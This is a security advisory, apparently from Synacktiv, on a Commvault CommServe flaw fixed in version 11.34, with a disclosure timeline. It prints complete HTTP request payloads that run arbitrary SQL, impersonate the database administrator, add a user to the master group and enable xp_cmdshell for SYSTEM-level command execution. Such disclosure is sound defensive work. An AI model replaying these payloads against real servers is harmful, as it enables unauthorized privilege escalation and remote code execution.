Dangerous feature in Commvault CommServe < 11.34
07/03/2024 - Download
Product
Commvault CommServe
Severity
Medium
Fixed Version(s)
11.34
Affected Version(s)
< 11.34
CVE Number
N/A
Authors
Description
Presentation
The CommServe server is the central management component of the CommCell environment. It coordinates and executes all CommCell operations, maintaining Microsoft SQL Server databases that contain all configuration, security, and operational history for the CommCell environment.
Issue(s)
Synacktiv discovered a vulnerability in Commvault CommServe versions before 11.34 allowing users with Add dataset
and Query datasource
privileges to interact with the CommServe database and impersonate the database owner. It allows these users to:
- Elevate their privileges to
master
. - Execute remote commands on the CommServe server.
Timeline
Date | Description |
---|---|
2023.02.07 | Advisory sent to Commvault |
2024.01.12 | Version 11.34 released, which fixes the vulnerability |
2024.03.07 | Public release |
Technical details
Description
Add dataset
and Query datasource
privileges are allowed to execute arbitrary queries on the MS-SQL database of the CommServe server:
POST /webconsole/proxy/cr/reportsplusengine/datasets/test/select/ HTTP/1.1
Host: 192.168.56.210
Cookie: JSESSIONID=[...]
Content-Type: application/json
X-Csrf-Token: [...]
{
"dataSet":[
{
"dataSet":{
"dataSetName":"test",
"dataSetGuid":"f2d42ed6-834a-4808-fbbb-49dd2a95dfdf",
"originalDataSetName":""
},
"endpoint":"DATABASE",
"databaseName":"CommServ",
"GetOperation":{
"sqlText":"select user_name();",
"postQueryFilter":true
},
"dataSources":[
{
"connectionType":"COMMCELL",
"commCell":{
"commCellName":"$LocalCommCell$"
}
}
],
"originalQuery":""
}
]
}
HTTP/1.1 200
{[...]"recordsCount":1,"records":[ ["commvault","sqlexec_cv"]],[...]}
The previous response shows that the SQL request is executed as the sqlexec_cv
user. The latter can impersonate the sqladmin_cv
user, which has system administrator privileges on the database:
POST /webconsole/proxy/cr/reportsplusengine/datasets/test/select/ HTTP/1.1
Host: 192.168.56.210
Cookie: JSESSIONID=[...]
Content-Type: application/json
X-Csrf-Token: [...]
{
"dataSet": [
{
"dataSet": {
"dataSetName": "test",
"dataSetGuid": "f2d42ed6-834a-4808-fbbb-49dd2a95dfdf",
"originalDataSetName": ""
},
"endpoint": "DATABASE",
"databaseName": "CommServ",
"GetOperation": {
"sqlText": "EXECUTE AS login = 'sqladmin_cv'; SELECT current_user, IS_SRVROLEMEMBER('sysadmin');",
"postQueryFilter": true
},
"dataSources": [
{
"connectionType": "COMMCELL",
"commCell": {
"commCellName": "$LocalCommCell$"
}
}
],
"originalQuery": ""
}
]
}
HTTP/1.1 200
{[...]"recordsCount": 1,"records": [["commvault","dbo",1]],[...]
}
Impact
Privilege escalation
By impersonating sqladmin_cv
, it is possible to add any user to the master
group.
First, the id of the user to be added to the master
group can be retrieved from the UMUsers
table:
POST /webconsole/proxy/cr/reportsplusengine/datasets/test/select/ HTTP/1.1
Host: 192.168.56.210
Cookie: JSESSIONID=[...]
Content-Type: application/json
X-Csrf-Token: [...]
{
"dataSet": [
{
"dataSet": {
"dataSetName": "test",
"dataSetGuid": "f2d42ed6-834a-4808-fbbb-49dd2a95dfdf",
"originalDataSetName": ""
},
"endpoint": "DATABASE",
"databaseName": "CommServ",
"GetOperation": {
"sqlText": "SELECT id, login FROM UMUsers;",
"postQueryFilter": true
},
"dataSources": [
{
"connectionType": "COMMCELL",
"commCell": {
"commCellName": "$LocalCommCell$"
}
}
],
"originalQuery": ""
}
]
}
HTTP/1.1 200
["commvault",5,"user",
[...]]
A row is then added to the UmUserGroup
table, to add the user
user (id 5) to the master
group (id 1):
POST /webconsole/proxy/cr/reportsplusengine/datasets/test/select/ HTTP/1.1
Host: 192.168.56.210
Cookie: JSESSIONID=[...]
Content-Type: application/json
X-Csrf-Token: [...]
{
"dataSet": [
{
"dataSet": {
"dataSetName": "test32",
"dataSetGuid": "f2d42ed6-834a-4808-fbbb-49dd2a95dfdf",
"originalDataSetName": ""
},
"endpoint": "DATABASE",
"databaseName": "CommServ",
"GetOperation": {
"sqlText": "EXECUTE AS login = 'sqladmin_cv'; SET IDENTITY_INSERT UMUserGroup ON; INSERT INTO UMUserGroup(userId, groupId, flag, umUserGroupId) VALUES (5, 1, 0, 5);",
"postQueryFilter": true
},
"dataSources": [
{
"connectionType": "COMMCELL",
"commCell": { "commCellName": "$LocalCommCell$"
}
}
],
"originalQuery": ""
}
]
}
HTTP/1.1 200
[...]
The user
user is then a member of the master
group:
Remote command execution
By impersonating sqladmin_cv
, it is possible to execute arbitrary commands on the CommServe server:
POST /webconsole/proxy/cr/reportsplusengine/datasets/test/select/ HTTP/1.1
Host: 192.168.56.210
Cookie: JSESSIONID=[...]
Content-Type: application/json
X-Csrf-Token: [...]
{
"dataSet": [
{
"dataSet": {
"dataSetName": "test",
"dataSetGuid": "f2d42ed6-834a-4808-fbbb-49dd2a95dfdf",
"originalDataSetName": ""
},
"endpoint": "DATABASE",
"databaseName": "CommServ",
"GetOperation": {
"sqlText": "EXECUTE AS login = 'sqladmin_cv'; EXEC sp_configure 'show advanced options', '1'; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', '1'; RECONFIGURE; EXEC xp_cmdshell whoami;",
"postQueryFilter": true
},
"dataSources": [
{
"connectionType": "COMMCELL",
"commCell": {
"commCellName": "$LocalCommCell$"
}
}
],
"originalQuery": ""
}
]
}
HTTP/1.1 200
{[...]"recordsCount": 2,"records": [["commvault","nt authority\\system"],[...]
}